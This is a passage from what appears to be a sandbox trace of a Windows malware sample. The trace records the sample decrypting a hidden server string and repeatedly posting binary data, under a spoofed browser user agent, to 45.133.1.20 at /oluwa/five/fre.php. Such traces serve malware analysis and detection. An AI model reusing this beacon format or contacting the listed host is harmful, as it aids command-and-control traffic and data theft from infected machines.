HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0291.717] GetProcessHeap () returned 0x6a0000 [0291.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8170 [0291.718] GetProcessHeap () returned 0x6a0000 [0291.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.718] GetProcessHeap () returned 0x6a0000 [0291.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0291.718] GetProcessHeap () returned 0x6a0000 [0291.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0291.719] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.720] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0291.720] GetProcessHeap () returned 0x6a0000 [0291.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0291.721] GetProcessHeap () returned 0x6a0000 [0291.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.721] send (s=0xadc, buf=0x6bd460*, len=242, flags=0) returned 242 [0291.722] send (s=0xadc, buf=0x6bb998*, len=159, flags=0) returned 159 [0291.722] GetProcessHeap () returned 0x6a0000 [0291.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0291.722] recv (in: s=0xadc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0291.800] GetProcessHeap () returned 0x6a0000 [0291.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0291.801] GetProcessHeap () returned 0x6a0000 [0291.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0291.804] GetProcessHeap () returned 0x6a0000 [0291.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8170 | out: hHeap=0x6a0000) returned 1 [0291.804] GetProcessHeap () returned 0x6a0000 [0291.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0291.805] closesocket (s=0xadc) returned 0 [0291.805] GetProcessHeap () returned 0x6a0000 [0291.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0291.805] GetProcessHeap () returned 0x6a0000 [0291.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.806] GetProcessHeap () returned 0x6a0000 [0291.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0291.806] GetProcessHeap () returned 0x6a0000 [0291.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0291.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x142c) returned 0xadc [0291.809] Sleep (dwMilliseconds=0xea60) [0291.811] GetProcessHeap () returned 0x6a0000 [0291.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0291.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.814] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.821] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0291.922] GetProcessHeap () returned 0x6a0000 [0291.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0291.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.942] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0291.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.944] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.946] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.946] GetProcessHeap () returned 0x6a0000 [0291.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0291.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.948] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0291.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.962] CryptDestroyKey (hKey=0x6ad020) returned 1 [0291.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.964] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0291.964] GetProcessHeap () returned 0x6a0000 [0291.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0291.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.965] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0291.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.966] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0291.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.967] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0291.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.969] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0291.969] GetProcessHeap () returned 0x6a0000 [0291.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0291.983] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0291.983] GetProcessHeap () returned 0x6a0000 [0291.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0291.985] GetProcessHeap () returned 0x6a0000 [0291.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.986] GetProcessHeap () returned 0x6a0000 [0291.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0291.986] GetProcessHeap () returned 0x6a0000 [0291.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0291.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.987] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.043] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0292.054] GetProcessHeap () returned 0x6a0000 [0292.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0292.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.056] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0292.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.057] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.058] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.058] GetProcessHeap () returned 0x6a0000 [0292.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0292.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.060] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0292.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.062] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0292.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.063] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0292.063] GetProcessHeap () returned 0x6a0000 [0292.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0292.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.064] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0292.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.066] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0292.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.067] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0292.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.068] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0292.068] GetProcessHeap () returned 0x6a0000 [0292.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0292.068] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0292.068] GetProcessHeap () returned 0x6a0000 [0292.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0292.068] socket (af=2, type=1, protocol=6) returned 0xae0 [0292.069] connect (s=0xae0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0292.234] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0292.234] GetProcessHeap () returned 0x6a0000 [0292.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0292.234] GetProcessHeap () returned 0x6a0000 [0292.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0292.235] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0292.238] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.238] GetProcessHeap () returned 0x6a0000 [0292.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d85f0 [0292.239] GetProcessHeap () returned 0x6a0000 [0292.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0292.239] GetProcessHeap () returned 0x6a0000 [0292.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0292.239] GetProcessHeap () returned 0x6a0000 [0292.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0292.240] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0292.241] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.241] GetProcessHeap () returned 0x6a0000 [0292.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0292.242] GetProcessHeap () returned 0x6a0000 [0292.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0292.242] send (s=0xae0, buf=0x6bd460*, len=242, flags=0) returned 242 [0292.243] send (s=0xae0, buf=0x6bb998*, len=159, flags=0) returned 159 [0292.243] GetProcessHeap () returned 0x6a0000 [0292.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0292.243] recv (in: s=0xae0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0292.351] GetProcessHeap () returned 0x6a0000 [0292.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0292.352] GetProcessHeap () returned 0x6a0000 [0292.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0292.353] GetProcessHeap () returned 0x6a0000 [0292.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d85f0 | out: hHeap=0x6a0000) returned 1 [0292.353] GetProcessHeap () returned 0x6a0000 [0292.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0292.354] closesocket (s=0xae0) returned 0 [0292.354] GetProcessHeap () returned 0x6a0000 [0292.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0292.355] GetProcessHeap () returned 0x6a0000 [0292.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0292.355] GetProcessHeap () returned 0x6a0000 [0292.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0292.355] GetProcessHeap () returned 0x6a0000 [0292.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0292.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1434) returned 0xae0 [0292.359] Sleep (dwMilliseconds=0xea60) [0292.360] GetProcessHeap () returned 0x6a0000 [0292.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0292.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.362] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.371] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0292.379] GetProcessHeap () returned 0x6a0000 [0292.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0292.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.382] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0292.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.383] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.384] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.384] GetProcessHeap () returned 0x6a0000 [0292.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0292.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.386] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0292.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.388] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0292.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.389] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0292.430] GetProcessHeap () returned 0x6a0000 [0292.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0292.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.431] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.433] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.434] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.435] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.436] GetProcessHeap () returned 0x6a0000 [0292.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0292.436] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.436] GetProcessHeap () returned 0x6a0000 [0292.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0292.437] GetProcessHeap () returned 0x6a0000 [0292.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0292.437] GetProcessHeap () returned 0x6a0000 [0292.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0292.438] GetProcessHeap () returned 0x6a0000 [0292.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0292.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.448] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0292.458] GetProcessHeap () returned 0x6a0000 [0292.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0292.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.459] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0292.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.464] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.466] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.467] GetProcessHeap () returned 0x6a0000 [0292.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0292.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.469] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0292.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.470] CryptDestroyKey (hKey=0x6ad020) returned 1 [0292.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.471] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0292.471] GetProcessHeap () returned 0x6a0000 [0292.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0292.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.472] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0292.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.474] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0292.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.487] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0292.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.490] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0292.490] GetProcessHeap () returned 0x6a0000 [0292.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0292.530] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0292.530] GetProcessHeap () returned 0x6a0000 [0292.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0292.530] socket (af=2, type=1, protocol=6) returned 0xae4 [0292.531] connect (s=0xae4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0292.557] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0292.557] GetProcessHeap () returned 0x6a0000 [0292.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0292.557] GetProcessHeap () returned 0x6a0000 [0292.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0292.558] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0292.559] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.559] GetProcessHeap () returned 0x6a0000 [0292.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d80b0 [0292.559] GetProcessHeap () returned 0x6a0000 [0292.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0292.560] GetProcessHeap () returned 0x6a0000 [0292.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0292.561] GetProcessHeap () returned 0x6a0000 [0292.561] RtlAllocateHeap 